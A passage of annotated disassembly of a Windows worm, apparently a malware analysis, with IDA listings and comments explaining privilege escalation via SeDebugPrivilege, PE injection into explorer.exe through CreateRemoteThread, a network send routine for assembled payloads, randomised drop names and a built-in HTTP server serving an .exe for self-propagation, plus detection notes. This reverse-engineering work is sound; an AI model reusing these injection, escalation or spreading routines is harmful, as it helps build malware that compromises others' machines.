        push [ ebp + var_4 ]
        call ebx ; send
        push edi
        call esi ; Sleep
        push 0
        lea eax, [ ebp + var_774 ]
        push 640h
        push eax
        push [ ebp + var_4 ]
        call dword_3100116C ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_310017AD
        cmp [ ebp + arg_0 ], 0              ; flag: 0 = layout A, 1 = layout B
        jz loc_31001748
        ; Layout B final: assemble var_89E4 and var_690C from embedded blobs
        ; (dword_31004768 68h, dword_310047D4 70h, dword_31004848 84h) plus
        ; slices of the widened 90h buffer, then send 10FCh + 0FDCh bytes.
        push 68h
        lea eax, [ ebp + var_89E4 ]
        push offset dword_31004768
        push eax
        call sub_31002B98 ; memcpy
        lea eax, [ ebp + var_4834 ]
        push 1B5Ah
        push eax
        lea eax, [ ebp + var_897C ]
        push eax
        call sub_31002B98 ; memcpy
        push 70h
        lea eax, [ ebp + var_690C ]
        push offset dword_310047D4
        push eax
        call sub_31002B98 ; memcpy
        lea eax, [ ebp + var_37A0 ]
        push 0A5Eh
        push eax
        lea eax, [ ebp + var_689C ]
        push eax
        call sub_31002B98 ; memcpy
        push 84h
        lea eax, [ ebp + var_5DD8 ]
        push offset dword_31004848
        push eax
        call sub_31002B98 ; memcpy
        add esp, 3Ch
        lea eax, [ ebp + var_89E4 ]
        push 0
        push 10FCh
        push eax
        push [ ebp + var_4 ]
        call ebx ; send
        push edi
        call esi ; Sleep
        push 0
        lea eax, [ ebp + var_774 ]
        push 640h
        push eax
        push [ ebp + var_4 ]
        call dword_3100116C ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_310017AD
        push 0
        push 0FDCh
        lea eax, [ ebp + var_690C ]
        jmp loc_310017A0                    ; -> final send of var_690C
    ; ---------------------------------------------------------------------------
    loc_31001658:                           ; CODE XREF: sub_31001262 + 22Bj
        ; Layout B prep: flag := 1; var_2CD8 = 0DACh bytes of 90h with
        ; dword_31004940 / byte_31004000 / loc_310049B8 patched in; then widen it
        ; into var_4834 and prefill both send buffers with 31h.
        push 0DACh
        lea eax, [ ebp + var_2CD8 ]
        push 90h
        push eax
        mov [ ebp + arg_0 ], 1
        call sub_31002B8C ; memset
        push 4
        lea eax, [ ebp + var_24F4 ]
        push offset dword_31004940
        push eax
        call sub_31002B98 ; memcpy
        push offset byte_31004000
        call sub_31002B92 ; strlen
        push eax
        lea eax, [ ebp + var_24E4 ]
        push offset byte_31004000
        push eax
        call sub_31002B98 ; memcpy
        push 4
        lea eax, [ ebp + var_21C0 ]
        push offset loc_310049B8            ; 4 data bytes despite the code-style label
        push eax
        call sub_31002B98 ; memcpy
        push 4
        lea eax, [ ebp + var_21BC ]
        push offset dword_31004940
        push eax
        call sub_31002B98 ; memcpy
        add esp, 40h
        push offset byte_31004000
        call sub_31002B92 ; strlen
        push eax
        lea eax, [ ebp + var_21B0 ]
        push offset byte_31004000
        push eax
        call sub_31002B98 ; memcpy
        add esp, 10h
        ; Widen var_2CD8 (0DACh bytes) into var_4834 (byte, 0, byte, 0, ...)
        xor ecx, ecx
        lea eax, [ ebp + var_4833 ]
    loc_310016F4:                           ; CODE XREF: sub_31001262 + 4A8j
        mov dl, [ ebp + ecx + var_2CD8 ]
        mov [ eax - 1 ], dl
        and byte ptr [ eax ], 0
        inc ecx
        inc eax
        inc eax
        cmp ecx, 0DACh
        jl short loc_310016F4
        and [ ebp + var_2CDC ], 0
        and [ ebp + var_2CDB ], 0
        push 1C52h
        lea eax, [ ebp + var_89E4 ]
        push 31h
        push eax
        call sub_31002B8C ; memset
        push 1C52h
        lea eax, [ ebp + var_690C ]
        push 31h
        push eax
        call sub_31002B8C ; memset
        add esp, 18h
        jmp loc_310014F9                    ; rejoin the common sequence
    ; ---------------------------------------------------------------------------
    loc_31001748:                           ; CODE XREF: sub_31001262 + 339j
        ; Layout A final: var_1F28 = dword_31004654 (7Ch) + var_F44 (7D0h) +
        ; dword_310046D4 (90h); send 0CF8h bytes.
        push 7Ch
        lea eax, [ ebp + var_1F28 ]
        push offset dword_31004654
        push eax
        call sub_31002B98 ; memcpy
        lea eax, [ ebp + var_F44 ]
        push 7D0h
        push eax
        lea eax, [ ebp + var_1EAC ]
        push eax
        call sub_31002B98 ; memcpy
        push 90h
        lea eax, [ ebp + var_16DC ]
        push offset dword_310046D4
        push eax
        call sub_31002B98 ; memcpy
        add esp, 24h
        and [ ebp + var_1231 ], 0
        lea eax, [ ebp + var_1F28 ]
        push 0
        push 0CF8h
    loc_310017A0:                           ; CODE XREF: sub_31001262 + 3F1j
        ; Final send: eax = buffer, length and flags already pushed.
        push eax
        push [ ebp + var_4 ]
        call ebx ; send
        push edi
        call esi ; Sleep
        and [ ebp + var_C ], 0              ; result = 0 (success) -- send() result itself is not checked
    loc_310017AD:                           ; CODE XREF: sub_31001262 + 1ADj ; sub_31001262 + 1E1j ...
        push 2                              ; SD_BOTH
        push [ ebp + var_4 ]
        call dword_31001170 ; shutdown
    loc_310017B8:                           ; CODE XREF: sub_31001262 + 166j
        push [ ebp + var_4 ]
        call dword_31001174 ; closesocket
        pop esi
    loc_310017C2:                           ; CODE XREF: sub_31001262 + 37j
        mov eax, [ ebp + var_C ]
        pop edi
        pop ebx
        leave
        retn
    sub_31001262 endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_310017C9 -- enable SeDebugPrivilege on the current process token,
    ; resolving the token APIs at run time by name (a common evasion of static
    ; import analysis; the string constants themselves are good signatures).
    ; C-style (cdecl): void sub_310017C9(void)
    ; Out:  nothing meaningful (eax holds the last API result)
    ; Locals: var_C = HANDLE token; var_1C..var_10 = TOKEN_PRIVILEGES
    ;         { PrivilegeCount=1, Luid (var_18), Attributes=2 (SE_PRIVILEGE_ENABLED) }
    ; Clobbers: eax, ecx, edx, flags
    ; Notes:
    ;  - The token handle in var_C is never closed, and the advapi32 module
    ;    reference is never released.
    ;  - Two `call` operands below were mangled by extraction; from the
    ;    preceding stores they are `call [ebp+var_4]` (OpenProcessToken) and
    ;    `call [ebp+var_8]` (LookupPrivilegeValueA).
    ;  - The final `call esi` is AdjustTokenPrivileges, not GetProcAddress:
    ;    esi was overwritten with the resolved pointer. IDA's comment is stale.
    ;-----------------------------------------------------------------------
    sub_310017C9 proc near                  ; CODE XREF: UPX0:loc_31001DCAp
    var_1C = dword ptr - 1Ch
    var_18 = byte ptr - 18h
    var_10 = dword ptr - 10h
    var_C = dword ptr - 0Ch
    var_8 = dword ptr - 8
    var_4 = dword ptr - 4
        push ebp
        mov ebp, esp
        sub esp, 1Ch
        push esi
        push edi
        push offset aAdvapi32 ; "advapi32"
        call dword_31001090 ; LoadLibraryA
        mov esi, dword_3100108C             ; esi = GetProcAddress
        mov edi, eax                        ; edi = hAdvapi32
        push offset aOpenprocesstok ; "OpenProcessToken"
        push edi
        call esi ; GetProcAddress
        test eax, eax
        mov [ ebp + var_4 ], eax            ; var_4 = OpenProcessToken
        jz short loc_3100184D
        push offset aLookupprivileg ; "LookupPrivilegeValueA"
        push edi
        call esi ; GetProcAddress
        test eax, eax
        mov [ ebp + var_8 ], eax            ; var_8 = LookupPrivilegeValueA
        jz short loc_3100184D
        push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
        push edi
        call esi ; GetProcAddress
        mov esi, eax                        ; esi = AdjustTokenPrivileges (GetProcAddress pointer is gone)
        test esi, esi
        jz short loc_3100184D
        ; OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES (20h), &var_C)
        lea eax, [ ebp + var_C ]
        push eax
        push 20h
        call dword_31001088 ; GetCurrentProcess
        push eax
        call + var_4 ]>[ ebp + var_4 ]      ; mangled: call [ebp+var_4] = OpenProcessToken
        ; LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &var_18 /* Luid */)
        lea eax, [ ebp + var_18 ]
        mov [ ebp + var_1C ], 1             ; PrivilegeCount = 1
        push eax
        push offset aSedebugprivile ; "SeDebugPrivilege"
        push 0
        mov [ ebp + var_10 ], 2             ; Attributes = SE_PRIVILEGE_ENABLED
        call + var_8 ]>[ ebp + var_8 ]      ; mangled: call [ebp+var_8] = LookupPrivilegeValueA
        ; AdjustTokenPrivileges(var_C, FALSE, &var_1C, 10h, NULL, NULL)
        push 0
        push 0
        lea eax, [ ebp + var_1C ]
        push 10h
        push eax
        push 0
        push [ ebp + var_C ]
        call esi ; GetProcAddress          ; actually AdjustTokenPrivileges (see header)
    loc_3100184D:                           ; CODE XREF: sub_310017C9 + 28j ; sub_310017C9 + 37j ...
        pop edi
        pop esi
        leave
        retn
    sub_310017C9 endp

    ########################## SUBROUTINE ##########################

<doc_update>
    ;-----------------------------------------------------------------------
    ; sub_31001851 -- copy a PE image into another process and start a thread
    ; in it (classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread
    ; injection). The target is the owner of the "Shell_TrayWnd" window --
    ; normally the shell's taskbar, i.e. explorer.exe -- with the foreground
    ; window's owner as fallback.
    ; C-style (cdecl): int sub_31001851(LPTHREAD_START_ROUTINE start)
    ; In:   arg_0 = start address for the remote thread
    ; Out:  eax = 0 ok; 1 = VirtualAllocEx/CreateRemoteThread not resolved;
    ;       2 = no target window; 3 = OpenProcess failed; 4 = VirtualAllocEx
    ;       failed; 5 = CreateRemoteThread failed
    ; Globals read: dword_31004FD0 = base of the PE image to inject (the code
    ;       walks e_lfanew at +3Ch, then OptionalHeader.ImageBase at +34h and
    ;       SizeOfImage at +50h of IMAGE_NT_HEADERS); dword_31004FC4 = a handle
    ;       that is closed after the write (purpose not visible here).
    ; Locals: var_4 = result; var_8 = target PID; var_C = ImageBase;
    ;       var_10 = VirtualAllocEx ptr, later reused as bytes-written out-arg;
    ;       var_14 = CreateRemoteThread ptr; var_18 = remote thread id
    ; Clobbers: eax, ecx, edx, flags
    ; Notes:
    ;  - WriteProcessMemory uses the SAME address (eax) as remote destination
    ;    and local source, so the source image must already be mapped locally
    ;    at its preferred ImageBase -- presumably this module itself
    ;    (Imagebase 31000000); the remote allocation is requested at that base.
    ;  - WriteProcessMemory's return value is not checked.
    ;  - Detection: OpenProcess with 42Ah (CREATE_THREAD|VM_OPERATION|VM_WRITE|
    ;    QUERY_INFORMATION) followed by a cross-process write and remote thread
    ;    into explorer.exe from an unsigned binary; mutex name "uterm13".
    ;  - Two `call` operands were mangled by extraction: they are
    ;    `call [ebp+var_10]` (VirtualAllocEx) and `call [ebp+var_14]`
    ;    (CreateRemoteThread).
    ;-----------------------------------------------------------------------
    sub_31001851 proc near                  ; CODE XREF: UPX0:31001DDEp
    var_18 = byte ptr - 18h
    var_14 = dword ptr - 14h
    var_10 = dword ptr - 10h
    var_C = dword ptr - 0Ch
    var_8 = dword ptr - 8
    var_4 = dword ptr - 4
    arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        sub esp, 18h
        mov ecx, dword_31004FD0             ; ecx = image base (DOS header)
        and [ ebp + var_4 ], 0              ; result = 0
        push ebx
        push esi
        mov eax, [ ecx + 3Ch ]              ; e_lfanew
        push edi
        add eax, ecx                        ; eax = IMAGE_NT_HEADERS
        push offset aKernel32 ; "kernel32"
        mov ecx, [ eax + 34h ]              ; OptionalHeader.ImageBase
        mov edi, [ eax + 50h ]              ; edi = OptionalHeader.SizeOfImage
        mov [ ebp + var_C ], ecx
        call dword_310010A0 ; GetModuleHandleA
        mov esi, dword_3100108C             ; esi = GetProcAddress
        mov ebx, eax                        ; ebx = hKernel32
        push offset aVirtualallocex ; "VirtualAllocEx"
        push ebx
        call esi ; GetProcAddress
        test eax, eax
        mov [ ebp + var_10 ], eax
        jnz short loc_31001898
    loc_31001894:                           ; CODE XREF: sub_31001851 + 54j
        push 1                              ; return 1: API not resolved
        jmp short loc_310018E9
    ; ---------------------------------------------------------------------------
    loc_31001898:                           ; CODE XREF: sub_31001851 + 41j
        push offset aCreateremoteth ; "CreateRemoteThread"
        push ebx
        call esi ; GetProcAddress
        test eax, eax
        mov [ ebp + var_14 ], eax
        jz short loc_31001894
        ; FindWindowA("Shell_TrayWnd", NULL), else GetForegroundWindow()
        push 0
        push offset aShell_traywnd ; "Shell_TrayWnd"
        call dword_31001110 ; FindWindowA
        test eax, eax
        jnz short loc_310018C6
        call dword_31001114 ; GetForegroundWindow
        test eax, eax
        jnz short loc_310018C6
        push 2                              ; return 2: no target window
        jmp short loc_310018E9
    ; ---------------------------------------------------------------------------
    loc_310018C6:                           ; CODE XREF: sub_31001851 + 65j ; sub_31001851 + 6Fj
        lea ecx, [ ebp + var_8 ]
        push ecx
        push eax
        call dword_31001118 ; GetWindowThreadProcessId   ; var_8 = owning PID
        push [ ebp + var_8 ]
        push 0                              ; bInheritHandle = FALSE
        push 42Ah                           ; desired access (see header)
        call dword_3100109C ; OpenProcess
        mov ebx, eax                        ; ebx = hProcess
        test ebx, ebx
        jnz short loc_310018EC
        push 3                              ; return 3: OpenProcess failed
    loc_310018E9:                           ; CODE XREF: sub_31001851 + 45j ; sub_31001851 + 73j
        pop eax
        jmp short loc_31001957
    ; ---------------------------------------------------------------------------
    loc_310018EC:                           ; CODE XREF: sub_31001851 + 94j
        ; VirtualAllocEx(hProcess, ImageBase, SizeOfImage,
        ;                MEM_COMMIT|MEM_RESERVE (3000h), PAGE_READWRITE (4))
        push 4
        push 3000h
        push edi
        push [ ebp + var_C ]
        push ebx
        call + var_10 ]>[ ebp + var_10 ]    ; mangled: call [ebp+var_10] = VirtualAllocEx
        mov esi, dword_31001098             ; esi = CloseHandle
        test eax, eax
        jz short loc_3100194A
        ; WriteProcessMemory(hProcess, eax, eax, SizeOfImage, &var_10)
        lea ecx, [ ebp + var_10 ]
        push ecx
        push edi
        push eax                            ; lpBuffer = same address locally
        push eax                            ; lpBaseAddress = remote allocation
        push ebx
        call dword_31001094 ; WriteProcessMemory   ; result unchecked
        push dword_31004FC4
        call esi ; CloseHandle
        ; CreateRemoteThread(hProcess, NULL, 0, start, (LPVOID)1, 0, &var_18)
        lea eax, [ ebp + var_18 ]
        xor edi, edi
        push eax
        push edi
        push 1                              ; lpParameter = 1
        push [ ebp + arg_0 ]
        push edi
        push edi
        push ebx
        call + var_14 ]>[ ebp + var_14 ]    ; mangled: call [ebp+var_14] = CreateRemoteThread
        cmp eax, edi
        jz short loc_31001936
        push eax
        call esi ; CloseHandle              ; drop the thread handle
        jmp short loc_31001951
    ; ---------------------------------------------------------------------------
    loc_31001936:                           ; CODE XREF: sub_31001851 + DEj
        push offset aUterm13 ; "uterm13"
        call sub_3100198A                   ; CreateMutexA("uterm13") -- marker on failure path
        pop ecx
        mov [ ebp + var_4 ], 5              ; return 5: remote thread failed
        jmp short loc_31001951
    ; ---------------------------------------------------------------------------
    loc_3100194A:                           ; CODE XREF: sub_31001851 + B2j
        mov [ ebp + var_4 ], 4              ; return 4: remote allocation failed
    loc_31001951:                           ; CODE XREF: sub_31001851 + E3j ; sub_31001851 + F7j
        push ebx
        call esi ; CloseHandle              ; close hProcess
        mov eax, [ ebp + var_4 ]
    loc_31001957:                           ; CODE XREF: sub_31001851 + 99j
        pop edi
        pop esi
        pop ebx
        leave
        retn
    sub_31001851 endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_3100195C -- seed the CRT PRNG.
    ; C-style (cdecl): void sub_3100195C(void)
    ; Seed = GetTickCount() + esp * (low 32 bits of rdtsc). Note the seed is
    ; derived from predictable quantities (tick count, stack pointer, TSC); the
    ; rand()-based names built elsewhere (sub_310019D4) are therefore not
    ; cryptographically random.
    ; Locals: var_8 = rdtsc low dword, var_4 = esp snapshot
    ; Clobbers: eax, ecx, edx, flags
    ;-----------------------------------------------------------------------
    sub_3100195C proc near                  ; CODE XREF: sub_31001C18 + Bp ; UPX0:31001DA0p ...
    var_8 = dword ptr - 8
    var_4 = dword ptr - 4
        push ebp
        mov ebp, esp
        push ecx                            ; reserve 8 bytes of locals
        push ecx
        push ebx
        push esi
        push edi
        pusha
        rdtsc
        mov [ ebp + var_8 ], eax            ; keep only the low half of the timestamp counter
        popa
        mov [ ebp + var_4 ], esp
        call dword_310010A4 ; GetTickCount
        mov ecx, [ ebp + var_4 ]
        imul ecx, [ ebp + var_8 ]
        add eax, ecx                        ; seed = ticks + esp * tsc_lo
        push eax
        call dword_310010FC ; srand
        pop ecx
        pop edi
        pop esi
        pop ebx
        leave
        retn
    sub_3100195C endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_3100198A -- CreateMutexA(NULL, bInitialOwner=TRUE, name).
    ; C-style (cdecl): HANDLE sub_3100198A(LPCSTR name)
    ; Out:  eax = mutex handle (never closed by the callers seen here).
    ;       Presumably a run-once / infection marker; the name passed at
    ;       loc_31001936 is "uterm13".
    ; Clobbers: eax, ecx, edx, flags
    ;-----------------------------------------------------------------------
    sub_3100198A proc near                  ; CODE XREF: sub_31001851 + EAp ; UPX0:31001DAAp ...
    arg_0 = dword ptr 4
        push [ esp + arg_0 ]                ; lpName
        push 1                              ; bInitialOwner = TRUE
        push 0                              ; lpMutexAttributes = NULL
        call dword_310010A8 ; CreateMutexA
        retn
    sub_3100198A endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_31001999 -- CreateThread wrapper that returns the thread handle.
    ; C-style (cdecl): HANDLE sub_31001999(LPTHREAD_START_ROUTINE fn, LPVOID arg)
    ; In:   arg_0 = fn, arg_4 = arg. The arg_4 stack slot is also passed as
    ;       lpThreadId, so it is overwritten with the new thread's id.
    ; Out:  eax = thread handle (caller owns it; contrast sub_310019B3)
    ; Clobbers: eax, ecx, edx, flags
    ;-----------------------------------------------------------------------
    sub_31001999 proc near                  ; CODE XREF: sub_31001E06 + E3p ; sub_31001E06 + EEp ...
    arg_0 = dword ptr 8
    arg_4 = dword ptr 0Ch
        push ebp
        mov ebp, esp
        lea eax, [ ebp + arg_4 ]
        push eax                            ; lpThreadId = &arg_4
        xor eax, eax
        push eax                            ; dwCreationFlags = 0
        push [ ebp + arg_4 ]                ; lpParameter
        push [ ebp + arg_0 ]                ; lpStartAddress
        push eax                            ; dwStackSize = 0
        push eax                            ; lpThreadAttributes = NULL
        call dword_310010AC ; CreateThread
        pop ebp
        retn
    sub_31001999 endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_310019B3 -- fire-and-forget CreateThread: same as sub_31001999 but
    ; the thread handle is closed immediately.
    ; C-style (cdecl): BOOL sub_310019B3(LPTHREAD_START_ROUTINE fn, LPVOID arg)
    ; In:   arg_0 = fn, arg_4 = arg (slot overwritten with the thread id)
    ; Out:  eax = CloseHandle result (FALSE if CreateThread returned NULL)
    ; Clobbers: eax, ecx, edx, flags
    ;-----------------------------------------------------------------------
    sub_310019B3 proc near                  ; CODE XREF: sub_31001C18 + 12Cp ; sub_31001FA5 + 5Ap ...
    arg_0 = dword ptr 8
    arg_4 = dword ptr 0Ch
        push ebp
        mov ebp, esp
        lea eax, [ ebp + arg_4 ]
        push eax                            ; lpThreadId = &arg_4
        xor eax, eax
        push eax                            ; dwCreationFlags = 0
        push [ ebp + arg_4 ]                ; lpParameter
        push [ ebp + arg_0 ]                ; lpStartAddress
        push eax                            ; dwStackSize = 0
        push eax                            ; lpThreadAttributes = NULL
        call dword_310010AC ; CreateThread
        push eax
        call dword_31001098 ; CloseHandle   ; called even when eax == NULL
        pop ebp
        retn
    sub_310019B3 endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_310019D4 -- fill a buffer with `count` random lowercase letters and
    ; NUL-terminate it.
    ; C-style (cdecl): void sub_310019D4(char *buf, int count)
    ; In:   arg_0 = buf (must hold count+1 bytes), arg_4 = count (signed)
    ; Each byte = 'a' + rand() % 26. Used by the file-drop / registry code
    ; (callers sub_31002476, sub_31002542) -- randomized names defeat simple
    ; static filename indicators; the PRNG seed comes from sub_3100195C.
    ; Edge case: a negative count skips the loop but still writes the
    ; terminator at buf[count], i.e. before the buffer.
    ; Clobbers: eax, ecx, edx, flags
    ;-----------------------------------------------------------------------
    sub_310019D4 proc near                  ; CODE XREF: sub_31002476 + 3Bp ; sub_31002542 + 64p ...
    arg_0 = dword ptr 4
    arg_4 = dword ptr 8
        push ebx
        mov ebx, [ esp + 4 + arg_0 ]        ; ebx = buf
        push esi
        push edi
        mov edi, [ esp + 0Ch + arg_4 ]      ; edi = count
        xor esi, esi                        ; esi = index
        test edi, edi
        jle short loc_310019FC              ; signed: count <= 0 -> no letters
    loc_310019E5:                           ; CODE XREF: sub_310019D4 + 26j
        call dword_310010F8 ; rand
        push 1Ah
        cdq
        pop ecx                             ; ecx = 26
        idiv ecx                            ; edx = rand() % 26
        add dl, 61h                         ; + 'a'
        mov [ esi + ebx ], dl
        inc esi
        cmp esi, edi
        jl short loc_310019E5
    loc_310019FC:                           ; CODE XREF: sub_310019D4 + Fj
        and byte ptr [ ebx + edi ], 0       ; buf[count] = 0
        pop edi
        pop esi
        pop ebx
        retn
    sub_310019D4 endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_31001A04 -- run a command line via CreateProcessA and discard the
    ; resulting handles.
    ; C-style (cdecl): BOOL sub_31001A04(LPSTR cmdline, WORD showWindow)
    ; In:   arg_0 = lpCommandLine (lpApplicationName is NULL)
    ;       arg_4 = stored into STARTUPINFO.wShowWindow (offset 30h)
    ; Out:  eax = CreateProcessA result
    ; Locals: var_54 = STARTUPINFO (cb = 44h), var_10/var_C = PROCESS_INFORMATION
    ;         (hProcess / hThread)
    ; Clobbers: eax, ecx, edx, flags
    ; Notes:
    ;  - STARTUPINFO.dwFlags stays 0 after the memset, so wShowWindow has no
    ;    effect (STARTF_USESHOWWINDOW is never set) -- looks like a latent bug.
    ;  - PROCESS_INFORMATION is not zeroed; if CreateProcessA fails, both
    ;    CloseHandle calls receive uninitialized stack values.
    ;-----------------------------------------------------------------------
    sub_31001A04 proc near                  ; CODE XREF: sub_310026A6 + 105p
    var_54 = dword ptr - 54h
    var_24 = word ptr - 24h
    var_10 = dword ptr - 10h
    var_C = dword ptr - 0Ch
    arg_0 = dword ptr 8
    arg_4 = word ptr 0Ch
        push ebp
        mov ebp, esp
        sub esp, 54h
        push esi
        push edi
        push 44h
        xor esi, esi                        ; esi = 0
        pop edi                             ; edi = 44h = sizeof(STARTUPINFO)
        lea eax, [ ebp + var_54 ]
        push edi
        push esi
        push eax
        call sub_31002B8C ; memset          ; memset(&si, 0, 44h)
        mov ax, [ ebp + arg_4 ]
        add esp, 0Ch
        mov [ ebp + var_24 ], ax            ; si.wShowWindow = arg_4
        ; CreateProcessA(NULL, cmdline, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)
        lea eax, [ ebp + var_10 ]
        push eax
        lea eax, [ ebp + var_54 ]
        push eax
        push esi
        push esi
        push esi
        push esi
        push esi
        push esi
        mov [ ebp + var_54 ], edi           ; si.cb = 44h
        push [ ebp + arg_0 ]
        push esi
        call dword_310010B0 ; CreateProcessA
        push [ ebp + var_C ]                ; pi.hThread
        mov esi, dword_31001098             ; esi = CloseHandle
        mov edi, eax                        ; edi = result
        call esi ; CloseHandle
        push [ ebp + var_10 ]               ; pi.hProcess
        call esi ; CloseHandle
        mov eax, edi
        pop edi
        pop esi
        leave
        retn
    sub_31001A04 endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_31001A5A -- return the local host's first IPv4 address.
    ; C-style (cdecl): DWORD sub_31001A5A(void)
    ; Out:  eax = first entry of hostent->h_addr_list (network byte order);
    ;       0 if gethostname failed; 100007Fh (127.0.0.1 in network order) if
    ;       gethostbyname returned NULL
    ; Locals: var_34 = hostname buffer (gethostname is given 31h bytes)
    ; Clobbers: eax, ecx, edx, flags
    ; Note: on the gethostname failure path WSAGetLastError is called but its
    ;       result is discarded.
    ;-----------------------------------------------------------------------
    sub_31001A5A proc near                  ; CODE XREF: sub_3100202D + 3Ep ; sub_310020F4 + 7p ...
    var_34 = byte ptr - 34h
        push ebp
        mov ebp, esp
        sub esp, 34h
        lea eax, [ ebp + var_34 ]
        push 31h                            ; namelen
        push eax
        call dword_3100114C ; gethostname
        cmp eax, 0FFFFFFFFh                 ; SOCKET_ERROR
        jnz short loc_31001A7B
        call dword_31001150 ; WSAGetLastError   ; result unused
        xor eax, eax                        ; return 0
        leave
        retn
    ; ---------------------------------------------------------------------------
    loc_31001A7B:                           ; CODE XREF: sub_31001A5A + 15j
        lea eax, [ ebp + var_34 ]
        push eax
        call dword_31001154 ; gethostbyname
        test eax, eax
        jnz short loc_31001A90
        mov eax, 100007Fh                   ; 127.0.0.1 (network byte order)
        leave
        retn
    ; ---------------------------------------------------------------------------
    loc_31001A90:                           ; CODE XREF: sub_31001A5A + 2Dj
        mov eax, [ eax + 0Ch ]              ; hostent->h_addr_list
        mov eax, [ eax ]                    ; h_addr_list[0]
        mov eax, [ eax ]                    ; *(DWORD *)h_addr_list[0]
        leave
        retn
    sub_31001A5A endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_31001A99 -- InternetGetConnectedState(&flags, 0), normalised to 0/1.
    ; C-style (cdecl): int sub_31001A99(void)
    ; Out:  eax = 1 if the API returned nonzero, else 0 (flags are discarded)
    ; Clobbers: eax, ecx, edx, flags
    ;-----------------------------------------------------------------------
    sub_31001A99 proc near                  ; CODE XREF: sub_31001F41 + 22p ; sub_31001FA5 + 27p ...
    var_4 = byte ptr - 4
        push ecx                            ; 4-byte local for lpdwFlags
        lea eax, [ esp + 4 + var_4 ]
        push 0                              ; dwReserved = 0
        push eax                            ; lpdwFlags
        call dword_31001134 ; InternetGetConnectedState
        neg eax
        sbb eax, eax                        ; -1 if nonzero, else 0
        neg eax                             ; 1 or 0
        pop ecx
        retn
    sub_31001A99 endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_31001AAF -- signal a named event if it exists:
    ; OpenEventA(EVENT_MODIFY_STATE (2), FALSE, name) then SetEvent.
    ; C-style (cdecl): void sub_31001AAF(LPCSTR name)
    ; Out:  eax = OpenEventA/SetEvent result
    ; Note: the event handle returned by OpenEventA is never closed.
    ; Clobbers: eax, ecx, edx, flags
    ;-----------------------------------------------------------------------
    sub_31001AAF proc near                  ; CODE XREF: sub_31001E06 + 40p ; sub_31001E06 + 4Cp ...
    arg_0 = dword ptr 4
        push [ esp + arg_0 ]                ; lpName
        push 0                              ; bInheritHandle = FALSE
        push 2                              ; dwDesiredAccess = EVENT_MODIFY_STATE
        call dword_310010B8 ; OpenEventA
        test eax, eax
        jz short locret_31001AC8
        push eax
        call dword_310010B4 ; SetEvent      ; handle leaked afterwards
    locret_31001AC8:                        ; CODE XREF: sub_31001AAF + 10j
        retn
    sub_31001AAF endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_31001AC9 -- build a 32-bit value from two rand() calls:
    ; (rand() << 16) | rand().
    ; C-style (cdecl): DWORD sub_31001AC9(void)
    ; Out:  eax = combined value. Not suitable as a secret: the CRT PRNG is
    ;       seeded predictably by sub_3100195C.
    ; Clobbers: eax, ecx, edx, flags
    ;-----------------------------------------------------------------------
    sub_31001AC9 proc near                  ; CODE XREF: UPX0:31002B69p
        push esi
        mov esi, dword_310010F8             ; esi = rand
        push edi
        call esi ; rand
        mov edi, eax
        shl edi, 10h                        ; high half
        call esi ; rand
        or eax, edi                         ; low half | high half
        pop edi
        pop esi
        retn
    sub_31001AC9 endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_31001ADF -- per-connection thread of a minimal built-in HTTP server.
    ; Signature (stdcall, `retn 4`; created by sub_31001C18 as a thread proc):
    ;   DWORD WINAPI sub_31001ADF(SOCKET s)
    ; Behaviour: read up to 100h bytes; if the request contains both "GET" and
    ; ".exe", answer with a fixed 200 OK header (3Dh bytes), a
    ; "Content-Length: %u" line and the dword_31004FC0-byte body at
    ; dword_31004FB8 in 1000h-byte chunks with 64h ms pauses; otherwise send a
    ; bare 200 OK and the 3 bytes at dword_31004A80. Serving an .exe from
    ; memory over raw sockets is consistent with self-distribution to hosts
    ; compromised by sub_31001262 -- confirm by checking what dword_31004FB8
    ; points to.
    ; Out:  1 = recv failed, 2 = a body send failed (both paths return WITHOUT
    ;       closing the socket); the normal path ends in ExitThread(0), so the
    ;       trailing `xor eax,eax` / epilogue is unreachable on that path.
    ; Register roles: ebx = socket, edi = bytes of body already sent,
    ;       esi = strstr then send
    ; Clobbers: eax, ecx, edx, flags
    ; Notes for readers:
    ;  - var_100 is 100h bytes and recv may fill all of them; no NUL is added
    ;    before strstr, so the search can run past the buffer.
    ;  - The chunk loop stops on any send() shorter than 1000h bytes, which
    ;    also cuts the transfer short on a partial send of a full chunk.
    ;-----------------------------------------------------------------------
    sub_31001ADF proc near                  ; DATA XREF: sub_31001C18 + 127o
    var_200 = byte ptr - 200h               ; Content-Length line
    var_100 = byte ptr - 100h               ; request buffer (100h bytes)
    arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        sub esp, 200h
        push ebx
        mov ebx, [ ebp + arg_0 ]            ; ebx = socket
        push esi
        push edi
        xor edi, edi                        ; edi = 0 (recv flags; later send offset)
        ; recv(s, var_100, 100h, 0)
        lea eax, [ ebp + var_100 ]
        push edi
        push 100h
        push eax
        push ebx
        call dword_3100116C ; recv
        cmp eax, 0FFFFFFFFh
        jnz short loc_31001B10
        push 1                              ; return 1 (socket left open)
        jmp loc_31001BCB
    ; ---------------------------------------------------------------------------
    loc_31001B10:                           ; CODE XREF: sub_31001ADF + 28j
        mov esi, dword_310010F4             ; esi = strstr
        lea eax, [ ebp + var_100 ]
        push offset aGet ; "GET"
        push eax
        call esi ; strstr
        pop ecx
        test eax, eax
